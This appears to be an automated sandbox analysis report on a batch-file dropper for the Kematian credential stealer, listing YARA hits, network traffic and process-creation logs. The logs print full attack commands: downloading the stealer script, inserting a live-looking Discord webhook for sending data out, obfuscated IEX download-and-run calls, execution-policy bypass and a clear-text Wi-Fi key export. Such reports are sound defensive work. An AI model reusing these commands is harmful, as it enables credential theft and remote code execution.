            Source: powershell.exe, 00000014.00000002.1765711117.000001EC47FFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC4713E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.c
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC47FFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC46ED7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CBFC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
            Source: powershell.exe, 00000014.00000002.1765375407.000001EC44F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/injection.js
            Source: powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1
            Source: powershell.exe, 0000002C.00000002.2105443989.00000201CBFC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1
            Source: powershell.exe, 00000014.00000002.1784812345.000001EC5EF50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/childrenofyahweh/kematian-stealer/main/frontend-src/main.ps1
            Source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2331375157.000000C0000B6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: powershell.exe, 00000030.00000002.2331375157.000000C000247000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: powershell.exe, 00000028.00000002.2928167979.0000017EE82E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/cdn-cgi/trace
            Source: unknownNetwork traffic detected: HTTP traffic on port 63777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 63778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 63776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 63780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63780
            Source: unknownNetwork traffic detected: HTTP traffic on port 63775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 63779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63778
            Source: unknownNetwork traffic detected: HTTP traffic on port 63770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63770
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63775
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63776
            Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:63775 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:63776 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:63777 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:63778 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:63780 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\Desktop\kematian.ps1, type: DROPPED

            System Summary

            Source: amsi64_7296.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: amsi64_7296.amsi.csv, type: OTHERMatched rule: Detects PowerShell PoshWiFiStealer Author: ditekSHen
            Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000030.00000002.2641864548.000002A8730B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000030.00000002.2414199980.000002A86A80A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTRMatched rule: Detects PowerShell PoshWiFiStealer Author: ditekSHen
            Source: pirates.batStatic file information: 3787378
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript /b
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript /b
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A87347D4BF NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtMapViewOfSection,48_2_000002A87347D4BF
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A87347D4DC NtMapViewOfSection,48_2_000002A87347D4DC
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFD9BAD118831_2_00007FFD9BAD1188
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A87347D4BF48_2_000002A87347D4BF
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A87347DEB048_2_000002A87347DEB0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FCE8C048_2_000002A873FCE8C0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FB786048_2_000002A873FB7860
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A87400238048_2_000002A874002380
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FEC74048_2_000002A873FEC740
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FB55E048_2_000002A873FB55E0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FDA54048_2_000002A873FDA540
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FD1C8048_2_000002A873FD1C80
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FC1BC048_2_000002A873FC1BC0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FCA3C048_2_000002A873FCA3C0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FFC88048_2_000002A873FFC880
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FCE28048_2_000002A873FCE280
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FBDA0048_2_000002A873FBDA00
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FD91E048_2_000002A873FD91E0
            Source: amsi64_7296.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: amsi64_7296.amsi.csv, type: OTHERMatched rule: MALWARE_Win_PWSH_PoshWiFiStealer author = ditekSHen, description = Detects PowerShell PoshWiFiStealer
            Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000030.00000002.2641864548.000002A8730B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000030.00000002.2414199980.000002A86A80A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTRMatched rule: MALWARE_Win_PWSH_PoshWiFiStealer author = ditekSHen, description = Detects PowerShell PoshWiFiStealer
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winBAT@69/65@7/5
            Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\kdotkccaDE.bat
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4348:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3272:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k315zlmt.dfr.ps1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\7b0b5458a1aa2ee98f96435fa1e656ba5cc359b8239df23b0fd0c5d774ba2a20AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript //nologo temp.vbs
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\System32\cscript.exeFile read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: powershell.exe, 00000030.00000002.2770545725.000002A8743F3000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000030.00000002.2690768710.000002A873850000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: powershell.exe, 00000030.00000002.2770545725.000002A8743F3000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000030.00000002.2690768710.000002A873850000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: powershell.exe, 00000030.00000002.2770545725.000002A8743F3000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000030.00000002.2690768710.000002A873850000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: powershell.exe, 00000030.00000002.2770545725.000002A8743F3000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000030.00000002.2690768710.000002A873850000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: powershell.exe, 00000030.00000002.2770545725.000002A8743F3000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000030.00000002.2690768710.000002A873850000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
            Source: powershell.exe, 00000030.00000002.2770545725.000002A8743F3000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000030.00000002.2690768710.000002A873850000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: powershell.exe, 00000030.00000002.2770545725.000002A8743F3000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000030.00000002.2690768710.000002A873850000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cscript.exe cscript //nologo temp.vbs
            Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" "
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -c "Write-Host -NoNewLine $null"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net session
            Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\doskey.exe doskey CALL=SHIFT
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s kematian.ps1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\user\Desktop\pirates.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe wscript /b
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file kematian.ps1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user\AppData\Local\Temp\wifi key=clear
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A61.tmp" "c:\Users\user\AppData\Local\Temp\hvw5rqqp\CSC90E3CD70A79D45AA9723BEFA972FDA5B.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cscript.exe cscript //nologo temp.vbs
            Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" "
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -c "Write-Host -NoNewLine $null"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net session
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\doskey.exe doskey CALL=SHIFT
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s kematian.ps1
            Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user\AppData\Local\Temp\wifi key=clear
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
